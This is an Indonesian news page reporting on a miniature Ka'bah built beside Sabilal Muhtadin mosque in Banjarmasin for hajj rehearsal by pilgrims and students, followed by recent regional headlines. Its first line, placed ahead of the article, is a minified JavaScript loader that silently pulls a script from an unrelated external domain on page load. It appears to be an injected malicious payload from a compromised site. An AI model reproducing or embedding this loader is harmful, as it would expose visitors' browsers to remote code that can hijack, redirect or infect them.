(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
RELIGI

Ada Miniatur Ka’bah di Bawah Rindang Pepohonan Masjid Sabilal Muhtadin Banjarmasin


KANALKALIMANTAN.COM, BANJARMASIN – Sebuah bangunan baru berbentuk segi empat menjulang di samping Masjid Raya Sabilal Muhtadin, Kota Banjarmasin, Kalimamtan Selatan.

Bangunan miniatur mirip ka’bah tersebut menjadikan pesona tersendiri di masjid yang diresmikan Presiden RI Kedua Soeharto tanggal 9 Februari 1981 tersebut.

Nampak material miniatur ka’bah tersebut masih dalam kondisi baru dilapisi dengan spanduk layaknya kiswah ka’bah yang berada di Makkah, Arab Saudi.

Seorang pekerja juga terlihat ada yang melakukan pembersihan ranting-ranting pohon di sekitar bangunan menggunakan mesin pemotong, sedang dua orang lainnya membersihkan rumput-rumput di sekitar miniatur ka’bah.

Baca juga: Berawal dari Laka Lantas, Begini Kronologis Pengeroyokan di Depan SPBU Sungai Tabuk

Kanalkalimantan.com mengkonfirmasi ke Ketua Badan Pengelola Masjid Raya (BPMR) Sabilal Muhtadin Drs H Darul Qutni. Dikatakan bangunan tersebut memang sengaja dibangun dan saat ini masih dalam tahap finishing.

Ternyata pembangunan miniatur ka’bah tersebut bukan tanpa alasan. Darul Quthni mengatakan nantinya akan dijadikan para calon jemaah haji atau umrah untuk tempat simulasi manasik sebelum mereka berangkat ke Tanah Suci.

“Ya, untuk calon haji atau calon umrah atau umat Islam lainnya,” katanya, Kamis (20/7/2023) siang.

Baca juga: Pawai Obor Warga Desa Jungkal Malam 1 Muharram

Selain itu, miniatur ka’bah tersebut juga diperuntukkan bagi anak-anak atau pelajar yang ingin praktek manasik ibadah haji umrah.

Sebab, di lingkungan Masjid Sabilal Muhtadin juga terdapat yayasan pendidikan mulai dari TK, SD, SMP. Sementara itu untuk SMK SMA dan perguruan tinggi berada di lokasi berbeda yaitu di jalan Sultan Adam Banjarmasin.

“Pelajar dari TK dan seterusnya,” ujarnya.

Lokasi miniatur ka’bah yang berada persis di bawah rindang pohon-pohon lebat membuat sejuk sepanjang hari meskipun saat cuaca panas.

Baca juga: Buka Pariwisata dan Ekonomi Daerah, Pelita Air Terbang ke Pontianak

Ketua BPMR Sabilal Muhtadin berharap miniatur ka’bah tersebut dapat bermanfaat bagi seluruh umat muslim yang ingin belajar manasik haji. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Tak Ada Peminat Jalur Perseorangan di Pilwali Banjarbaru 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemilihan Wali Kota dan Wakil Wali Kota dalam kontestasi Pilkada 2024 di… Read More

18 menit ago

Kebakaran Dini Hari di Palangkaraya, Dana Hanya Bisa Selamatkan Anak Istri

KANALKALIMANTAN.COM, PALANGKARAYA - Puluhan rumah di permukiman padat penduduk Jalan Mendawai Induk, Kota Palangkaraya, Kalimantan… Read More

3 jam ago

Amuntai Expo dan Bazar UMKM 2024 Berakhir

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) melalui Asisten Perekonomian dan Pembangunan… Read More

3 jam ago

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

19 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

20 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

21 jam ago

This website uses cookies.